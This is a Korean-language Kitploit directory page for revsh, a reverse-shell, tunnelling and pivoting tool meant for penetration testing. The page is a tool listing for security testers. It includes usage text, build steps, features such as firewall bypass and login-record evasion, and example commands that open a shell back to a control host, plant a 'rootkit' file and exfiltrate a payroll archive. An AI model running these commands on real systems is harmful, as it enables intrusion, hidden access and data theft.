Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
revsh — 터미널 지원, 데이터 터널링 및 고급 피벗팅 기능을 갖춘 리버스 셸 | Kitploit
도구/GitHubGitHub/emptymonkey/revsh
Encryption/Decryption ToolsNetwork MappingIDS/IPS EvasionLateral MovementPost-ExploitationPenetration TestingCommand and ControlRed TeamingRemote Access Tool
GitHubemptymonkey/revsh

revsh

터미널 지원, 데이터 터널링 및 고급 피벗팅 기능을 갖춘 리버스 셸

469922년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기

revsh

_revsh_는 터미널 지원이 포함된 리버스 셸과 고급 피보팅을 위한 리버스 VPN, 그리고 임의 데이터 터널링을 설정하기 위한 도구입니다.

뉴스

  • 2018-08-09: 새 릴리스. 주로 버그/안정성 수정 및 OpenSSL 1.1.0 빌드 과정에 대한 더 나은 문서화. 업데이트된 빌드 지침은 아래 설치 섹션을 참조하세요.

개요

"리버스 셸"이란 무엇인가요?

리버스 셸은 원격 호스트에 셸 접근을 제공하는 네트워크 연결입니다. telnet이나 ssh 같은 다른 원격 로그인 도구와 달리, 리버스 셸은 원격 호스트에 의해 시작됩니다. 원격 네트워크에서 외부로 연결하는 이 기술은 인바운드 연결만 차단하도록 구성된 방화벽을 우회할 수 있게 합니다.

"리버스 VPN"이란 무엇인가요?

_revsh_는 암호화 터널의 양쪽 끝에 가상 이더넷 카드(tun/tap)를 연결할 수 있습니다. 이 카드들은 원시 IP 패킷 또는 이더넷 프레임을 전달하는 데 사용될 수 있습니다. Iptables NAT 규칙과 결합하거나 실제 이더넷 카드를 브리징하면, 운영자는 대상 머신의 네트워크에서 완전히 라우팅 가능한 IP 주소를 받을 수 있습니다. 이는 본질적으로 운영자에게 인바운드 패킷 필터링을 우회하고 전체 네트워크 접근을 허용하기 위해 콜백을 수행한 완전한 VPN입니다. (자세한 내용은 "Documentation/REVERSE_VPN.md"를 참조하세요.)

"바인드 셸"이란 무엇인가요?

바인드 셸은 일반적인 포워드 네트워크 연결을 통해 제공되는 셸입니다. _revsh_는 리버스 셸과 바인드 셸을 모두 지원합니다. 바인드 셸을 호출하려면 연결의 양쪽 끝에서 -b 플래그를 사용하거나 바이너리를 'bindsh'로 호출하면 됩니다.

그냥 netcat을 사용하면 안 되나요?

리버스 셸을 설정하는 많은 기술이 있지만, 이러한 방법들은 터미널 지원을 제공하지 않습니다. _revsh_는 의사 터미널을 통해 연결이 중개되는 리버스 셸을 가능하게 하여 다음과 같은 기능을 제공합니다:

  • 작업 제어
  • 제어 문자 처리 (예: Ctrl-C)
  • 자동 완성
  • 제어 tty가 필요한 프로그램 지원 (예: vi)
  • 창 크기 변경 이벤트 처리

또한 _revsh_는 다음 기능도 제공합니다:

  • UTF-8 지원.
  • utmp / wtmp 우회. (로그인 기록 없음.)
  • 로그인 시 rc 파일 명령을 처리하여 쉬운 스크립팅.
  • 키 기반 인증이 바이너리에 내장된 OpenSSL 암호화.
  • 요청 시 익명 Diffie-Hellman 암호화.
  • 기본적으로 일시적 Diffie-Hellman 암호화. (이제 더 나은 완전 순방향 비밀성!)
  • 싱크홀 및 중간자 대응 침입에 대한 보호를 위한 인증서 고정.
  • 원격 프로세스 자체 종료를 위한 연결 타임아웃.
  • 예측 불가능한 자동 재연결을 위한 무작위 재시도 타이머.
  • 파일 전송을 위한 Netcat 스타일 비대화형 데이터 브로커.
  • 프록시 지원: 점대점, SOCKS 4, SOCKS 4a 및 SOCKS 5. 완전한 유연성을 위해 양방향으로 프록시 사용 가능.
  • 원시 IP 패킷/이더넷 프레임 전달을 위한 TUN/TAP 지원.
  • 응답 없는 노드를 종료하거나 연결 통계를 출력하는 이스케이프 시퀀스 명령.

_revsh_는 암호화된 터널을 통해 전체 터미널 기능 세트를 제공하는 침투 테스터 도구 키트의 보조 도구로 사용됩니다.

어디서 _revsh_를 사용할 수 있나요?

_revsh_는 x86_64 Linux에서 개발되었습니다. 다음은 사용된 아키텍처/OS 조합의 간략한 목록입니다:

  • x86_64 Linux
  • i686 Linux
  • amd64 FreeBSD

(다른 플랫폼에서 revsh를 성공적으로 사용했다면 연락 주시면 목록에 추가하겠습니다.)

사용법

root@kitploit:~
empty@monkey:~$ revsh -h

Control:	revsh -c [CONTROL_OPTIONS] [MUTUAL_OPTIONS] [ADDRESS[:PORT]]
Target:		revsh     [TARGET_OPTIONS] [MUTUAL_OPTIONS] [ADDRESS[:PORT]]

	ADDRESS		The address of the control listener.		(Default is "0.0.0.0".)
	PORT		The port of the control listener.		(Default is "2200".)

CONTROL_OPTIONS:
	-c		Run in "command and control" mode.		(Default is target mode.)
	-a		Enable Anonymous Diffie-Hellman mode.		(Default is Ephemeral Diffie-Hellman.)
	-d KEYS_DIR	Reference the keys in an alternate directory.	(Default is "~/.revsh/keys/".)
	-f RC_FILE	Reference an alternate rc file.			(Default is "~/.revsh/rc".)
	-s SHELL	Invoke SHELL as the remote shell.		(Default is "/bin/bash".)
	-F LOG_FILE	Log general use and errors to LOG_FILE.		(No default set.)

TARGET_OPTIONS:
	-t SEC		Set the connection timeout to SEC seconds.	(Default is "3600".)
	-r SEC1,SEC2	Set the retry time to be SEC1 seconds, or	(Default is "600,1200".)
			to be random in the range from SEC1 to SEC2.

MUTUAL_OPTIONS:
	-k		Run in keep-alive mode.
			Node will neither exit normally, nor timeout.
	-L [LHOST:]LPORT:RHOST:RPORT
			Static socket forwarding with a local listener
			at LHOST:LPORT forwarding to RHOST:RPORT.
	-R [RHOST:]RPORT:LHOST:LPORT
			Static socket forwarding with a remote listener
			at RHOST:RPORT forwarding to LHOST:LPORT.
	-D [LHOST:]LPORT
			Dynamic socket forwarding with a local listener
			at LHOST:LPORT.					(Socks 4, 4a, and 5. TCP connect only.)
	-B [RHOST:]RPORT
			Dynamic socket forwarding with a remote
			listener at LHOST:LPORT.			(Socks 4, 4a, and 5. TCP connect only.)
	-x		Disable automatic setup of proxies.		(Defaults: Proxy D2280 and tun/tap devices.)
	-b		Start in bind shell mode.			(Default is reverse shell mode.)
			The -b flag must be invoked on both ends.
	-n		Non-interactive netcat style data broker.	(Default is interactive w/remote tty.)
			No tty. Useful for copying files.
	-v		Verbose. -vv and -vvv increase verbosity.
	-V		Print the program and protocol versions.
	-h		Print this help.
	-e		Print out some usage examples.

설치

먼저 OpenSSL을 소스에서 빌드해야 합니다. (아래 __참고__를 확인하세요.)

root@kitploit:~
git clone https://github.com/openssl/openssl.git
cd openssl/
./config no-shared -static	# 정적 애플리케이션을 OpenSSL에 대해 빌드하는 데 필요한 옵션입니다.
make && make test	# 시스템 기본 OpenSSL과 충돌하지 않도록 "make install"은 건너뜁니다. 이 트리에서 방금 컴파일한 OpenSSL을 사용하여 _revsh_를 빌드할 것입니다.
cd ..

이제 revsh를 빌드합니다.

root@kitploit:~
git clone https://github.com/emptymonkey/revsh.git
cd revsh
vi config.h        # 상황에 맞는 새로운 기본값을 설정하세요.
vi Makefile        # 선택한 빌드 환경이 원하는 것인지 확인하세요. (아마 기본적으로 이미 맞을 것입니다.)
make               # 매우 오래 걸릴 수 있지만, 보통은 그렇지 않습니다.
make install
vi ~/.revsh/rc     # 원격 셸의 느낌을 사용자 정의하려면 즐겨 사용하는 시작 명령을 추가하세요.
revsh -h

참고: OpenSSL 1.1.0 릴리스 이후, 정적으로 링크된 바이너리에서 사용하려면 OpenSSL을 소스에서 빌드해야 합니다. 대부분의 리눅스 배포판(칼리 포함)에 포함된 OpenSSL 라이브러리를 사용하여 정적으로 링크된 바이너리를 빌드하는 것은 작동하지 않습니다. (빌드가 된다 해도 SEGFAULT가 발생합니다.)

예제

컨트롤 호스트 예제 IP: 192.168.0.42
타겟 호스트 예제 IP: 192.168.0.66

root@kitploit:~
기본 포트 '2200'에서 대화형 예제:
	control:	revsh -c
	target:		revsh 192.168.0.42

비표준 포트 '443'에서 대화형 예제:
	control:	revsh -c 192.168.0.42:443
	target:		revsh 192.168.0.42:443

바인드 셸 예제:
	target:		revsh -b
	control:	revsh -c -b 192.168.0.66

비대화형 파일 업로드 예제:
	control:	cat ~/bin/rootkit | revsh -c -n
	target:		revsh 192.168.0.42 > ./totally_not_a_rootkit

비대화형 파일 다운로드 예제:
	control:	revsh -c -n >payroll_db.tar
	target:		cat payroll_db.tar | revsh 192.168.0.42

기존 터널을 통한 비대화형 파일 다운로드 예제:
	control:	revsh -c -n 127.0.0.1:2291 >payroll_db.tar
	target:		cat payroll_db.tar | revsh 127.0.0.1:2290
도구 다운로드